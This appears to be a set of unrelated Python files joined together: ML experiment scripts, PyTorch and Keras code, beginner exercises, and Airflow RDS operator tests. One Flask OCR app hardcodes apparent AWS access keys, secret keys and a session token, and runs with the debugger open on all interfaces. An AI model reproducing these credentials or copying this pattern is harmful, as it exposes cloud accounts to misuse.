# "github.com/soply/simple_estimation", "github.com/soply/nsim_algorithm",
# "github.com/dclambert/Python-ELM"
path_to_source = '../..'
def run_experiment(arguments):
# Load data set
X, Y, log_tf = load_data_set(arguments['dataset'], path_to_source)
estim = load_estimator(arguments['estimator_kwargs'], path_to_source)
# Prepare for experiments
n_test_sets = arguments['n_test_sets']
test_size = arguments['test_size']
param_grid = arguments['param_grid'] # Parameter grid for estimator to CV over
cv_folds = arguments['cv_folds']
n_jobs = arguments['n_jobs']
kf = ShuffleSplit(n_splits = arguments['n_test_sets'],
test_size = arguments['test_size'])
test_error = np.zeros(n_test_sets)
best_parameters = {}
test_iter = 0
computational_time = np.zeros(n_test_sets)
# Extra array to store dot products if estimator is nsim
almost_linearity_param = np.zeros(n_test_sets)
for idx_train, idx_test in kf.split(X):
start = time.time()
reg = GSCV(estimator = estim, param_grid = param_grid,
scoring = 'neg_mean_squared_error', iid = False,
cv = cv_folds, verbose = 0,
pre_dispatch = n_jobs,
error_score = np.nan,
refit = True) # If estimator fitting raises an exception
X_train, Y_train = X[idx_train,:], Y[idx_train]
X_test, Y_test = X[idx_test,:], Y[idx_test]
reg = reg.fit(X_train, Y_train)
Y_predict = reg.best_estimator_.predict(X_test)
end = time.time()
best_parameters[test_iter] = reg.best_params_
if arguments['estimator_kwargs']['estimator'] in ['isotron', 'slisotron']:
best_parameters[test_iter] = reg.best_estimator_.n_iter_cv()
if log_tf:
test_error[test_iter] = np.sqrt(mean_squared_error(np.exp(Y_test), np.exp(Y_predict)))
else:
test_error[test_iter] = np.sqrt(mean_squared_error(Y_test, Y_predict))
computational_time[test_iter] = end - start
if arguments['estimator_kwargs']['estimator'] == 'nsim':
almost_linearity_param[test_iter] = reg.best_estimator_.measure_almost_linearity()
test_iter += 1
print best_parameters
print test_error
# Save results
mean_error = np.mean(test_error)
std_error = np.std(test_error)
mean_computational_time = np.mean(computational_time)
mean_almost_linearity_param = np.mean(almost_linearity_param)
filename = arguments['filename']
filename_mod = filename
save_itr = 0
while os.path.exists('../results/' + filename_mod + '/'):
save_itr += 1
filename_mod = filename + '_' + str(save_itr)
else:
os.makedirs('../results/' + filename_mod + '/')
np.save('../results/' + filename_mod + '/test_errors.npy', test_error)
np.savetxt('../results/' + filename_mod + '/test_errors.txt', test_error)
np.savetxt('../results/' + filename_mod + '/computational_time.txt', computational_time)
np.savetxt('../results/' + filename_mod + '/computational_time_summary.txt', [mean_computational_time])
np.savetxt('../results/' + filename_mod + '/test_errors_summary.txt', np.array([mean_error, std_error]))
np.save('../results/' + filename_mod + '/best_params.npy', best_parameters)
if arguments['estimator_kwargs']['estimator'] == 'nsim':
np.savetxt('../results/' + filename_mod + '/almost_linearity_param.txt', almost_linearity_param)
np.savetxt('../results/' + filename_mod + '/almost_linearity_summary.txt', [mean_almost_linearity_param])
with open('../results/' + filename_mod + '/best_params_json.txt', 'w') as file:
file.write(json.dumps(best_parameters, indent=4))
with open('../results/' + filename_mod + '/log.txt', 'w') as file:
file.write(json.dumps(arguments, indent=4))
if __name__ == '__main__':
# Get number of jobs from sys.argv
if len(sys.argv) > 1:
n_jobs = int(sys.argv[1])
else:
n_jobs = 1 # Default 1 jobs
print 'Using n_jobs = {0}'.format(n_jobs)
# Data set
arguments = {
'filename' : 'Auto_FFNN_Sigmoid', # Name to store results
'dataset' : 'auto_mpg', # Data set identifier
'n_jobs' : n_jobs, # number of jobs to run in cv mode
'n_test_sets' : 30, # number of repititions of the experiment
'test_size' : 0.15, # size of the test set
'cv_folds' : 5, # CV is used for parameter choices
'estimator_kwargs' : { # Estimator details, content depends on the estimator
'estimator' : 'ffnn',
'general_options' : {
'learning_rate' : 0.01,
'n_iter' : 10000,
'valid_size' : 0.1,
}
# 'qp_solver' : None
},
'param_grid' : {
'n_hidden' : np.arange(2,20).tolist()
}
}
run_experiment(arguments)
|
import os
import random
from functools import partial
import numpy
import pytest
FLOAT_EQUALITY_ACCURACY = 0.001
pytest.approx = partial(pytest.approx, abs=FLOAT_EQUALITY_ACCURACY)
@pytest.fixture
def random_seed():
# TODO: change scope to module and reset it in test dropdown, tearup
seed = random.randint(0, 10000)
random.seed(seed)
numpy.random.seed(seed)
print("random seed:", seed, end=" ")
@pytest.fixture(scope='module')
def base_data_path():
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
result = os.path.normpath(SCRIPT_DIR)
result = os.path.join(result, "tests", "test_data_files") + os.sep
return result
|
from flask import Flask, request, render_template
import json
import boto3
from werkzeug.utils import secure_filename
textractclient = boto3.client("textract", aws_access_key_id="AKIAYRVCKL2B4FBREBWO",
aws_secret_access_key="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", region_name="us-east-2")
s3 = boto3.client('s3',
aws_access_key_id="ASIARAVRXUFNALU5QDGA",
aws_secret_access_key="4D+O/QtaIImUeBaIqAjLLlI50oqQnqGVrHMdUiqS",
aws_session_token="FwoGZXIvYXdzENj//////////wEaDIeyW6qOiQgg1ERYmiLCAWhQ0DGpHLcD7JZGbkFcnrGiyvADfsF4TUXGWdeTQUw0STzjjO+W6pyyV9IsazbaTiaLshCEYhgPNt3alsZjxsGgP/sw8gclvK03nKTYGrDUPqpbxsNp3YD5VOdg5t6GETLzx1lBIO4yXl/8SEmUW0csVp2FCW7FLDqGLl9DJzlZE8PVbPGXUNSdN3jqHXw/bKDb9ZQMPp6QaG2AHd/awC26SnAD5aQBPqQwYDMwT9BCPZHniYefYoOtR93afbpEL1NSKMjUwYkGMi394ktE2answHRaqzsMvJqqxYexXdFa47444GG/XzuqLOx7L7x4ILUnfIwcbPw="
)
app = Flask(__name__)
@app.route("/", methods=["GET"])
def main():
return render_template("index.html", jsonData=json.dumps({}))
@app.route("/english",methods=["GET"])
def english():
return render_template("english.html" ,jsonData=json.dumps({}))
@app.route("/italiana",methods=["GET"])
def italiana():
return render_template("italiana.html" ,jsonData=json.dumps({}))
@app.route("/german",methods=["GET"])
def german():
return render_template("german.html" ,jsonData=json.dumps({}))
@app.route("/espanol",methods=["GET"])
def espanol():
return render_template("spanish.html" ,jsonData=json.dumps({}))
@app.route("/french",methods=["GET"])
def french():
return render_template("french.html" ,jsonData=json.dumps({}))
@app.route("/portugese",methods=["GET"])
def portugese():
return render_template("portuguese.html" ,jsonData=json.dumps({}))
@app.route("/extract", methods=["POST"])
def extractImage():
file = request.files.get("filename")
binaryFile = file.read()
response = textractclient.detect_document_text(
Document={
'Bytes': binaryFile
}
)
extractedText = ""
for block in response['Blocks']:
if block["BlockType"] == "LINE":
# print('\033[94m' + item["Text"] + '\033[0m')
extractedText = extractedText+block["Text"]+" "
responseJson = {
"text": extractedText
}
print(responseJson)
return render_template("english.html", jsonData=json.dumps(responseJson))
BUCKET_NAME='easyextractwebsite'
@app.route('/upload',methods=['post'])
def upload():
if request.method == 'POST':
img = request.files['file']
if img:
filename = secure_filename(img.filename)
img.save(filename)
s3.upload_file(
Bucket = BUCKET_NAME,
Filename=filename,
Key = filename
)
msg = "Upload Done ! "
return render_template("index.html",msg =msg)
app.run("0.0.0.0", port=5000, debug=True) |
import pandas as pd
import sys
import os
import matplotlib.pyplot as plt
import seaborn as sns
pal = sns.color_palette()
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
from greyatomlib.quora_project.q01_load_data_questions.build import q01_load_data_questions
plt.switch_backend('agg')
path = 'data/train.csv'
def q02_len_questions_1():
|
#ht_test_data prediction
import os
import numpy as np
import csv
import pandas as pd
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.models import Model,load_model
from keras.utils import to_categorical
from keras.layers import Activation, Dense, Dropout,Input,Add,concatenate
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split,StratifiedKFold
from keras.layers import Conv1D,MaxPooling1D,Embedding,GlobalMaxPooling1D
from keras.initializers import Constant
from sklearn.metrics import accuracy_score,classification_report,confusion_matrix,precision_score,recall_score,f1_score
import pickle
#hyperparameters
vocab_size = 30000
batch_size = 128
embedding_dim = 300
max_len = 3000
# content/drive/My Drive/ML_Datasets/genData/test_data.pickle
#loading the pickled test data file
pickle_in = open("ht_test_text.pickle","rb")
X = pickle.load(pickle_in)
pickle_in = open("ht_test_data.pickle","rb")
data = pickle.load(pickle_in)
#loading the pickled tokenizer
pickle_in = open("tokenizer.pickle","rb")
tokenizer = pickle.load(pickle_in)
# tokenizer = Tokenizer(num_words = vocab_size)
# tokenizer.fit_on_texts(X)
# word_index = tokenizer.word_index
#tokenizing the text data
train_sentences_tokenized = tokenizer.texts_to_sequences(X)
#padding the sequences
X = pad_sequences(train_sentences_tokenized, maxlen=max_len)
tags = ['y','n']
label_enc = LabelBinarizer()
label_enc.fit(tags)
Y_1 = label_enc.transform(data['cSIN'])
Y_1 = to_categorical(Y_1)
Y_2 = label_enc.transform(data['cEXC'])
Y_2 = to_categorical(Y_2)
Y_3 = label_enc.transform(data['cCOM'])
Y_3 = to_categorical(Y_3)
Y_4 = label_enc.transform(data['cRUG'])
Y_4 = to_categorical(Y_4)
Y_5 = label_enc.transform(data['cSOP'])
Y_5 = to_categorical(Y_5)
#concatenating the binary laabels to for n_data_samples*10 (2 for each label [y or n])
Y = np.concatenate((Y_1,Y_2,Y_3,Y_4,Y_5),axis=1)
print(Y.shape)
# 'cSIN','cEXC','cCOM','cRUG','cSOP'
#performing he seven fold validation
kfold = StratifiedKFold(n_splits=7, shuffle=True, random_state=4991)
#list to store the accuracy, precision, recall score and f1-score for the 7-fold validation
acscores1 = []
acscores2 = []
acscores3 = []
acscores4 = []
acscores5 = []
prescores1 = []
prescores2 = []
prescores3 = []
prescores4 = []
prescores5 = []
rescores1 = []
rescores2 = []
rescores3 = []
rescores4 = []
rescores5 = []
fscores1 = []
fscores2 = []
fscores3 = []
fscores4 = []
fscores5 = []
#loading the trained models
model1 = load_model('my_model_cSIN_tag')
model2 = load_model('my_model_cEXC_tag')
model3 = load_model('my_model_cCOM_tag')
model4 = load_model('my_model_cSOP_tag')
model5 = load_model('my_model_cRUG_tag')
#performing the 7-fold validation for all the personality traits
a,b = 0,2
print('\n\nSincerity')
for train, test in kfold.split(X, Y[:,a:b].argmax(axis=1)):
pred = model1.predict(X[test])
pred = pred.argmax(axis=1)
c_matrix = confusion_matrix(Y[test,a:b].argmax(axis=1),pred)
print(c_matrix)
accuracy = accuracy_score(Y[test,a:b].argmax(axis=1),pred)
print('Accuracy : ',accuracy)
# precision = true positive / total predicted positive(True positive + False positive)
# recall = true positive / total actual positive(True positive + False Negative)
print(classification_report(Y[test,a:b].argmax(axis=1),pred))
acscores1.append(accuracy)
prescores1.append(precision_score(Y[test,a:b].argmax(axis=1),pred))
rescores1.append(recall_score(Y[test,a:b].argmax(axis=1),pred))
fscores1.append(f1_score(Y[test,a:b].argmax(axis=1),pred))
a,b = 2,4
print('\n\nExcitement')
for train, test in kfold.split(X, Y[:,a:b].argmax(axis=1)):
pred = model2.predict(X[test])
pred = pred.argmax(axis=1)
c_matrix = confusion_matrix(Y[test,a:b].argmax(axis=1),pred)
print(c_matrix)
accuracy = accuracy_score(Y[test,a:b].argmax(axis=1),pred)
print('Accuracy : ',accuracy)
# # precision = true positive / total predicted positive(True positive + False positive)
# # recall = true positive / total actual positive(True positive + False Negative)
print(classification_report(Y[test,a:b].argmax(axis=1),pred))
acscores2.append(accuracy)
prescores2.append(precision_score(Y[test,a:b].argmax(axis=1),pred))
rescores2.append(recall_score(Y[test,a:b].argmax(axis=1),pred))
fscores2.append(f1_score(Y[test,a:b].argmax(axis=1),pred))
a,b = 4,6
print('\n\nCompetence')
for train, test in kfold.split(X, Y[:,a:b].argmax(axis=1)):
pred = model3.predict(X[test])
pred = pred.argmax(axis=1)
c_matrix = confusion_matrix(Y[test,a:b].argmax(axis=1),pred)
print(c_matrix)
accuracy = accuracy_score(Y[test,a:b].argmax(axis=1),pred)
print('Accuracy : ',accuracy)
# precision = true positive / total predicted positive(True positive + False positive)
# recall = true positive / total actual positive(True positive + False Negative)
print(classification_report(Y[test,a:b].argmax(axis=1),pred))
acscores3.append(accuracy)
prescores3.append(precision_score(Y[test,a:b].argmax(axis=1),pred))
rescores3.append(recall_score(Y[test,a:b].argmax(axis=1),pred))
fscores3.append(f1_score(Y[test,a:b].argmax(axis=1),pred))
a,b = 6,8
print('\n\nRuggedness')
for train, test in kfold.split(X, Y[:,a:b].argmax(axis=1)):
pred = model5.predict(X[test])
pred = pred.argmax(axis=1)
c_matrix = confusion_matrix(Y[test,a:b].argmax(axis=1),pred)
print(c_matrix)
accuracy = accuracy_score(Y[test,a:b].argmax(axis=1),pred)
print('Accuracy : ',accuracy)
# precision = true positive / total predicted positive(True positive + False positive)
# recall = true positive / total actual positive(True positive + False Negative)
print(classification_report(Y[test,a:b].argmax(axis=1),pred))
acscores5.append(accuracy)
prescores5.append(precision_score(Y[test,a:b].argmax(axis=1),pred))
rescores5.append(recall_score(Y[test,a:b].argmax(axis=1),pred))
fscores5.append(f1_score(Y[test,a:b].argmax(axis=1),pred))
a,b = 8,10
print('\n\nSophistication')
for train, test in kfold.split(X, Y[:,a:b].argmax(axis=1)):
pred = model4.predict(X[test])
pred = pred.argmax(axis=1)
c_matrix = confusion_matrix(Y[test,a:b].argmax(axis=1),pred)
print(c_matrix)
accuracy = accuracy_score(Y[test,a:b].argmax(axis=1),pred)
print('Accuracy : ',accuracy)
# precision = true positive / total predicted positive(True positive + False positive)
# recall = true positive / total actual positive(True positive + False Negative)
print(classification_report(Y[test,a:b].argmax(axis=1),pred))
acscores4.append(accuracy)
prescores4.append(precision_score(Y[test,a:b].argmax(axis=1),pred))
rescores4.append(recall_score(Y[test,a:b].argmax(axis=1),pred))
fscores4.append(f1_score(Y[test,a:b].argmax(axis=1),pred))
#printing the output for all the personaliy traits
print('\n\nSincerity')
print(acscores1,'\nMean : ',np.mean(acscores1),'\nStandard deviation : ',np.std(acscores1),'\nPrecision Score : ',np.mean(prescores1),'\nRecall Score : ',np.mean(rescores1),'\nF1 Score : ',np.mean(fscores1))
print('\n\nExcitement')
print(acscores2,'\nMean : ',np.mean(acscores2),'\nStandard deviation : ',np.std(acscores2),'\nPrecision Score : ',np.mean(prescores2),'\nRecall Score : ',np.mean(rescores2),'\nF1 Score : ',np.mean(fscores2))
print('\n\nCompetence')
print(acscores3,'\nMean : ',np.mean(acscores3),'\nStandard deviation : ',np.std(acscores3),'\nPrecision Score : ',np.mean(prescores3),'\nRecall Score : ',np.mean(rescores3),'\nF1 Score : ',np.mean(fscores3))
print('\n\nSophistication')
print(acscores4,'\nMean : ',np.mean(acscores4),'\nStandard deviation : ',np.std(acscores4),'\nPrecision Score : ',np.mean(prescores4),'\nRecall Score : ',np.mean(rescores4),'\nF1 Score : ',np.mean(fscores4))
print('\n\nRuggedness')
print(acscores5,'\nMean : ',np.mean(acscores5),'\nStandard deviation : ',np.std(acscores5),'\nPrecision Score : ',np.mean(prescores5),'\nRecall Score : ',np.mean(rescores5),'\nF1 Score : ',np.mean(fscores5))
|
import torch
from torch import nn
import torchvision.utils as vutils
import torchvision.datasets as dset
from torch.utils.data import DataLoader
import torchvision.transforms as transforms
import numpy as np
import matplotlib.pyplot as plt
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def get_random_mask_mnist(input_batch):
bsize, c, h, w = input_batch.size()
mask = torch.ones((c, h, w), device=device, dtype=torch.bool)
if torch.rand(1).item() > 0.5:
if torch.rand(1).item() > 0.5:
mask[0, 4:16, 4:28] = 0
else:
mask[0, 16:28, 4:28] = 0
else:
if torch.rand(1).item() > 0.5:
mask[0, 4:28, 4:16] = 0
else:
mask[0, 4:28, 16:28] = 0
return mask
def select_white_line_images(data, proba):
result = data.clone()
if torch.rand(1).item() <= proba:
result[:, 0, 8:11, 6:16] = 1
return result
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.2)
nn.init.constant_(m.bias.data, 0)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.2)
nn.init.constant_(m.bias.data, 0)
elif classname.find('Linear') != -1:
nn.init.xavier_uniform_(m.weight.data)
nn.init.constant_(m.bias.data, 0)
def freeze(network):
for parameter in network.parameters():
parameter.requires_grad = False
def unfreeze(network):
for parameter in network.parameters():
parameter.requires_grad = True
def sample_z(batch_size, z_size):
# sampling z from the surface of the n-dimensional sphere
x = torch.randn(batch_size, z_size, device=device)
z = x.clone()
x_norm = z.pow(2).sum(dim=1, keepdim=True).sqrt().expand(-1, z_size)
z = x / x_norm
return z.unsqueeze(1)
def momentum_correction(net_Z, H, z, STEPS):
# optimize z
for _ in range(STEPS):
z_t = net_Z(H.squeeze(3).permute(0, 2, 1), z)
v_t = z_t[:, :, 10:]
z_t = z_t[:, :, :10]
rho = torch.sum(torch.abs(v_t), dim=2, keepdim=True)
z_t = z + rho * (z_t - z) / torch.norm((z_t - z), dim=2, keepdim=True)
z = z_t
return z
def plot_images(images, title=""):
plt.figure(figsize=(8, 8))
plt.axis("off")
plt.title(title)
plt.imshow(np.transpose(vutils.make_grid(images, padding=2, normalize=True).cpu(), (1, 2, 0)))
plt.show()
def get_mnist_data(batch_size, workers=2):
"""Dataset"""
dataroot = '/tmp/mnist'
transform = transforms.Compose([
transforms.Pad(2),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))])
train_dataset = dset.MNIST(dataroot, train=True, download=True, transform=transform)
test_dataset = dset.MNIST(dataroot, train=False, download=True, transform=transform)
# Create the dataloader
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)
test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)
return train_dataloader, test_dataloader
def add_noise_to_image(batch_images, ratio_noise_per_batch=0.2):
output = batch_images.clone()
# Get a random top half of an image
top_half = batch_images[torch.randint(batch_images.size(0), (1,)), :, :int(batch_images.size(2)/2), :]
# Indice of images that we want to modify by adding replacing their top half by the random top half
indice_images = torch.randperm(output.size(0))[:int(output.size(0)*ratio_noise_per_batch)]
output[indice_images, :, :int(output.size(2)/2), :] = top_half
return output |
msg = raw_input(' What is your fate Jolena? ')
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
msg = msg.upper()
for key in range(len(ALPHABET) ) :
result = ' '
for symbol in msg:
if symbol in ALPHABET:
num =ALPHABET.find(symbol)
num = num - key
if num < 0:
num = num + len(ALPHABET)
result = result + ALPHABET[num]
else:
result = result + symbol
print(' The fates declare your number is.........%s! %s' % (key, result))
|
import os
print(os.path.join('usr', 'bin', 'spam'))
myFiles = ['accounts.txt', 'details.csv', 'invite.docx']
for filenames in myFiles:
print(os.path.join('c:\\Users/hp/Desktop/python', filenames))
print(os.getcwd())
print(os.path.isabs('C:\\Users\hp\PycharmProjects\HackeRank'))
path = 'c:\\Users/hp/Downloads/things_fall_apart--_full_text.pdf'
print(os.path.dirname(path))
print(os.path.basename(path))
print(os.path.split(path))
path2 = 'c:\\Users/hp/Desktop/python'
print(os.path.getsize(path2))
print(os.listdir())
print(os.path.exists('d:\\'))
helloFile = open('c:\\Users/hp/Desktop/Hello.txt' , 'r')
content = helloFile.read()
print(content)
open1 = open('c:\\Users/hp/Desktop/sonnet29.txt', 'r')
open2 = open1.read()
print(open2)
baconFile = open('bacon.txt', 'w')
baconFile.write('Hello World!\n')
baconFile.close()
baconFile = open('bacon.txt', 'a')
baconFile.write('Bacon is not a vegetable.')
baconFile.close()
baconFile = open('bacon.txt')
content2 = baconFile.read()
print(content2)
import shelve
shelfFile = shelve.open('mydata')
cats = ['Marcellus', 'Pooka', 'Simon']
shelfFile['cats'] = cats
print(shelfFile['cats'])
shelfFile.close()
print(type(shelfFile))
shelfFile = shelve.open('mydata')
print(list(shelfFile.keys()))
print(list(shelfFile.values()))
shelfFile.close()
import pprint
cats = [{'name': 'Marcellus', 'desc':'Warrior'}, {'name':'Pooka', 'desc':'Fluffy'}]
pprint.pformat(cats)
fileObj = open('myCats.py', 'w')
fileObj.write('cats = ' + pprint.pformat(cats) + '\n')
fileObj.close()
fileObj = open('myCats.py', 'r')
content3 = fileObj.read()
print(content3)
import myCats
print(myCats.cats)
print(myCats.cats[0])
print(myCats.cats[0]['name']) |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import logging
from typing import TYPE_CHECKING
from unittest import mock
from unittest.mock import patch
import pytest
from moto import mock_rds
from airflow.exceptions import TaskDeferred
from airflow.models import DAG
from airflow.providers.amazon.aws.hooks.rds import RdsHook
from airflow.providers.amazon.aws.operators.rds import (
RdsBaseOperator,
RdsCancelExportTaskOperator,
RdsCopyDbSnapshotOperator,
RdsCreateDbInstanceOperator,
RdsCreateDbSnapshotOperator,
RdsCreateEventSubscriptionOperator,
RdsDeleteDbInstanceOperator,
RdsDeleteDbSnapshotOperator,
RdsDeleteEventSubscriptionOperator,
RdsStartDbOperator,
RdsStartExportTaskOperator,
RdsStopDbOperator,
)
from airflow.providers.amazon.aws.triggers.rds import RdsDbAvailableTrigger, RdsDbStoppedTrigger
from airflow.utils import timezone
if TYPE_CHECKING:
from airflow.providers.amazon.aws.hooks.base_aws import AwsGenericHook
DEFAULT_DATE = timezone.datetime(2019, 1, 1)
AWS_CONN = "amazon_default"
DB_INSTANCE_NAME = "my-db-instance"
DB_CLUSTER_NAME = "my-db-cluster"
DB_INSTANCE_SNAPSHOT = "my-db-instance-snap"
DB_CLUSTER_SNAPSHOT = "my-db-cluster-snap"
DB_INSTANCE_SNAPSHOT_COPY = "my-db-instance-snap-copy"
DB_CLUSTER_SNAPSHOT_COPY = "my-db-cluster-snap-copy"
EXPORT_TASK_NAME = "my-db-instance-snap-export"
EXPORT_TASK_SOURCE = "arn:aws:rds:es-east-1::snapshot:my-db-instance-snap"
EXPORT_TASK_ROLE_NAME = "MyRole"
EXPORT_TASK_ROLE_ARN = "arn:aws:iam:es-east-1::role/MyRole"
EXPORT_TASK_KMS = "arn:aws:kms:es-east-1::key/*****-****-****-****-********"
EXPORT_TASK_BUCKET = "my-exports-bucket"
SUBSCRIPTION_NAME = "my-db-instance-subscription"
SUBSCRIPTION_TOPIC = "arn:aws:sns:us-east-1::MyTopic"
def _create_db_instance(hook: RdsHook):
hook.conn.create_db_instance(
DBInstanceIdentifier=DB_INSTANCE_NAME,
DBInstanceClass="db.m4.large",
Engine="postgres",
)
if not hook.conn.describe_db_instances()["DBInstances"]:
raise ValueError("AWS not properly mocked")
def _create_db_cluster(hook: RdsHook):
hook.conn.create_db_cluster(
DBClusterIdentifier=DB_CLUSTER_NAME,
Engine="mysql",
MasterUsername="admin",
MasterUserPassword="admin-pass",
)
if not hook.conn.describe_db_clusters()["DBClusters"]:
raise ValueError("AWS not properly mocked")
def _create_db_instance_snapshot(hook: RdsHook):
hook.conn.create_db_snapshot(
DBInstanceIdentifier=DB_INSTANCE_NAME,
DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT,
)
if not hook.conn.describe_db_snapshots()["DBSnapshots"]:
raise ValueError("AWS not properly mocked")
def _create_db_cluster_snapshot(hook: RdsHook):
hook.conn.create_db_cluster_snapshot(
DBClusterIdentifier=DB_CLUSTER_NAME,
DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT,
)
if not hook.conn.describe_db_cluster_snapshots()["DBClusterSnapshots"]:
raise ValueError("AWS not properly mocked")
def _start_export_task(hook: RdsHook):
hook.conn.start_export_task(
ExportTaskIdentifier=EXPORT_TASK_NAME,
SourceArn=EXPORT_TASK_SOURCE,
IamRoleArn=EXPORT_TASK_ROLE_ARN,
KmsKeyId=EXPORT_TASK_KMS,
S3BucketName=EXPORT_TASK_BUCKET,
)
if not hook.conn.describe_export_tasks()["ExportTasks"]:
raise ValueError("AWS not properly mocked")
def _create_event_subscription(hook: RdsHook):
hook.conn.create_event_subscription(
SubscriptionName=SUBSCRIPTION_NAME,
SnsTopicArn=SUBSCRIPTION_TOPIC,
SourceType="db-instance",
SourceIds=[DB_INSTANCE_NAME],
)
if not hook.conn.describe_event_subscriptions()["EventSubscriptionsList"]:
raise ValueError("AWS not properly mocked")
def _patch_hook_get_connection(hook: AwsGenericHook) -> None:
# We're mocking all actual AWS calls and don't need a connection. This
# avoids an Airflow warning about connection cannot be found.
hook.get_connection = lambda _: None
class TestBaseRdsOperator:
dag = None
op = None
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.op = RdsBaseOperator(task_id="test_task", aws_conn_id="aws_default", dag=cls.dag)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.op
def test_hook_attribute(self):
assert hasattr(self.op, "hook")
assert self.op.hook.__class__.__name__ == "RdsHook"
class TestRdsCreateDbSnapshotOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_create_db_instance_snapshot(self):
_create_db_instance(self.hook)
instance_snapshot_operator = RdsCreateDbSnapshotOperator(
task_id="test_instance",
db_type="instance",
db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
db_identifier=DB_INSTANCE_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(instance_snapshot_operator.hook)
instance_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
instance_snapshots = result.get("DBSnapshots")
assert instance_snapshots
assert len(instance_snapshots) == 1
@mock_rds
@patch.object(RdsHook, "wait_for_db_snapshot_state")
def test_create_db_instance_snapshot_no_wait(self, mock_wait):
_create_db_instance(self.hook)
instance_snapshot_operator = RdsCreateDbSnapshotOperator(
task_id="test_instance_no_wait",
db_type="instance",
db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
db_identifier=DB_INSTANCE_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(instance_snapshot_operator.hook)
instance_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
instance_snapshots = result.get("DBSnapshots")
assert instance_snapshots
assert len(instance_snapshots) == 1
mock_wait.assert_not_called()
@mock_rds
def test_create_db_cluster_snapshot(self):
_create_db_cluster(self.hook)
cluster_snapshot_operator = RdsCreateDbSnapshotOperator(
task_id="test_cluster",
db_type="cluster",
db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
db_identifier=DB_CLUSTER_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(cluster_snapshot_operator.hook)
cluster_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
cluster_snapshots = result.get("DBClusterSnapshots")
assert cluster_snapshots
assert len(cluster_snapshots) == 1
@mock_rds
@patch.object(RdsHook, "wait_for_db_cluster_snapshot_state")
def test_create_db_cluster_snapshot_no_wait(self, mock_wait):
_create_db_cluster(self.hook)
cluster_snapshot_operator = RdsCreateDbSnapshotOperator(
task_id="test_cluster_no_wait",
db_type="cluster",
db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
db_identifier=DB_CLUSTER_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(cluster_snapshot_operator.hook)
cluster_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
cluster_snapshots = result.get("DBClusterSnapshots")
assert cluster_snapshots
assert len(cluster_snapshots) == 1
mock_wait.assert_not_called()
class TestRdsCopyDbSnapshotOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_copy_db_instance_snapshot(self):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
instance_snapshot_operator = RdsCopyDbSnapshotOperator(
task_id="test_instance",
db_type="instance",
source_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
target_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT_COPY,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(instance_snapshot_operator.hook)
instance_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT_COPY)
instance_snapshots = result.get("DBSnapshots")
assert instance_snapshots
assert len(instance_snapshots) == 1
@mock_rds
@patch.object(RdsHook, "wait_for_db_snapshot_state")
def test_copy_db_instance_snapshot_no_wait(self, mock_await_status):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
instance_snapshot_operator = RdsCopyDbSnapshotOperator(
task_id="test_instance_no_wait",
